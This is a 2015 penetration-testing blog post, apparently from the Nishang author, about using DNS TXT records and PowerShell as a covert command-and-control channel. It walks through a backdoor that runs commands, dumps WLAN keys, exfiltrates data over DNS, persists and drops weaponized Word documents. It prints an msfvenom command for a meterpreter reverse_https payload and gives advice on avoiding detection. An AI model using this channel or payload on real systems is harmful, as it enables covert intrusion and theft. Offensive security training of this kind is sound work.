Tuesday, January 20, 2015

Fun with DNS TXT Records and PowerShell

This post discusses using DNS TXT records with PowerShell for command, script and shellcode execution . Nishang and Kautilya have two payloads and data exfiltration methods based on DNS TXT records. There was a lot of room for improvement and there has been some considerable changes in the payloads.

Out-DnsTxt


We need a DNS server under our control to create TXT records. I use ZoneEdit.com for this. Nishang now has a new script called Out-DnsTxt.ps1 under the Utility category. This script takes as input a PowerShell script, command or a shellcode and outputs a text file containing compressed and Base64 encoded strings. Each newline separated string is the value we need to save as TXT record on our DNS. The lenght of a DNS TXT record assumed by the script is 255 characters.

Lets see an example. Below command encodes Get-Process cmdlet.

As the input was small Out-DnsTxt notified that only one TXT record needs to be created. Lets save it to command.alteredsecurity.com


Lets try it with a full script.

This time Out-DnsTxt tells us that three txt records need to be created. The encodedtxt.txt looks like this:
It would be better if the help is removed from a script before it is encoded to save space. Though, we have not done it in the above example.

Each line of this encoded script goes into a TXT record. Lets create three TXT records 1.alteredsecurity.com, 2.alteredsecurity.com and 3.alteredsecurity.com each containing a line from encodedtxt.txt. Lets query 1.alteredsecurity.com for its TXT records and see what it contains.



Now to use these, we have to use DNS_TXT_Pwnage backdoor from Nishang.

DNS_TXT_Pwnage

This backdoor is capable of receiving PowerShell commands and scripts from TXT records. Lets try running the command we saved to command.alteredsecurity.com.

And the result is:

Great! Here's how it works.

The contents of TXT records of StartDomain are compared with Cmdstring and PsString for instructions. If its contents matches Cmdstring, the CommandDomain is queried for a Command as in the above case and if its contents match PsString, the PSDomain is queried. The parameter Subdomain specify the number of subdomains of PSDomain which must be queried.

Lets see an example where we try running a script. We just need to change the content of start.alteredsecurity.com to "startscript" which is our magic string for executing scripts. As we have provided Subdomains 3, the script would query 1.script.alteredsecurity.com upto 3.script.alteredsecurity.com. Here is how the ZoneEdit control panel looks right now:

Ok, now when we run the above command, this is the result.

Neat! We executed Get-WLAN-Keys on the target. This opens up a very useful channel for communication.

DNS_TXT_Pwnage also provides exfiltration and reboot persistence capabilities similar to other backdoors in Nishang. While those could be seen in the script help, particluarly interesting to mention here is the DNS exfiltration option. If you have control over a DNS server which logs TXT queries made to it, it could be used for exfiltration.

I have blogged about exfiltration in detail in this post:

This is how the DNS server log may look:
Use Invoke-Decode from Utility directory to decode the above.

Now, lets try to drop some infected MS Word documents on a target using this script. We will use Out-Word from the Client directory for this. Since Out-Word needs arguments to be passed to it, lets make the function call from the script itself and remove the help. Out-DnsTxt shows the difference clearly. Before removing help 14 TXT records need to be created, after doing that only 9:

After creating 1 to 9.word.alteredsecurity.com, lets use DNS_TXT_Pwnage on the target:


Awesome! We are able to drop malicious/infected/weaponized Word documents with the help of DNS TXT records. Note the use of the parameter NoLoadFunction, it has been used because we were making the function call for Out-Word from the script itself.


Some pecularities to note for DNS_TXT_Pwnage: 
UPDATE (March 2015): DNS_TXT_Pwnage, after commit 101 in Nishang, supports passing Arguments to the downloaded scripts. Commands in the above demos have also been modified.

1.Arguments
Arguments to be passed to the downloaded script. For scripts in Nishang, you should pass the function name aling with parameters. For example, see that Get-WLAN-Keys is passed as -Arguments in above examples.

1. NoLoadFunction
This parameter is used for specifying that the script used in txt records $psdomain does NOT load a function. If the parameter is not specified the payload assumes that the script pulled from txt records would need function name to be executed. This need not be specified if you are using scripts from any popular PowerShell security tool.
2. AuthNS
If AuthNS, that is the Authorized NameServer of the domain under our control, is specified, the changes done to TXT records are almost immediately available to the backdoor running on the target. For example, you could remotely stop the backdoor by modifying the TXT record of start.alteredsecurity.com in above example if you are using AuthNS. Without AuthNS, it would take a longer time. But the flip side is that chances of detection increases. To avoid detection, it would be better to leave the query resolution to the target's default nameserver.

We could always use separate domains. One for serving instructions, another for commands, another one for scripts etc. It depends on the stealth requirements.

Now, lets try to execute shellcode.

Execute-DNSTXT-Code

Execute-DNSTXT-Code could be used to execute shellcode using the TXT records. 

Use below command to generate a shellcode using msfvenom:

./msfvenom -p windows/x64/meterpreter/reverse_https -f powershell LHOST=192.168.254.226 > pspayload64.txt

The above shellcode is encoded and Out-DnsTxt informs that 5 TXT records need to be created. Lets create 1.64.alteredsecurity.com to 5.64.alteredsecurity.com for 64 bit target and 1.32.alteredsecurity.com to 5.32.alteredsecurity.com. The script is able to check if it is running on a 64-bit PowerShell process or 32-bit, the appropriate domains are queried for shellcode.

To use the TXT records generated using Out-DnsTxt for above, we have to use Execute-DNSTXT-Code from Execution directory in Nishang.

And here is the result.
Bingo! A meterpreter served using DNS TXT records and the execution takes place entirely in memory!

Updated Nishang code could be find here: https://github.com/samratashok/nishang

That is all! Hope you enjoyed this. Feedback and bug reports are welcome.

If this looks interesting to you, I am doing trainings on "PowerShell for Penetration Testers" during March 2015.  A one day training at CanSecWest on 14th March (details here) and a two day training at Troopers on 16th-17th March 2015 (details here).

4 comments:

  1. Great job!
    Is there a chance to make all this using ICMP echo request / reply ?

    ReplyDelete
    Replies
    1. Not tried it yet but that certainly is on my ToDo list.

      Delete
  2. Do you happen to have a PCAP you could possibly share. I would to see what the traffic looks like on the wire.

    ReplyDelete
    Replies
    1. No, sorry. But if you have a Windows machine, you can always generate traffic for analysis.

      Delete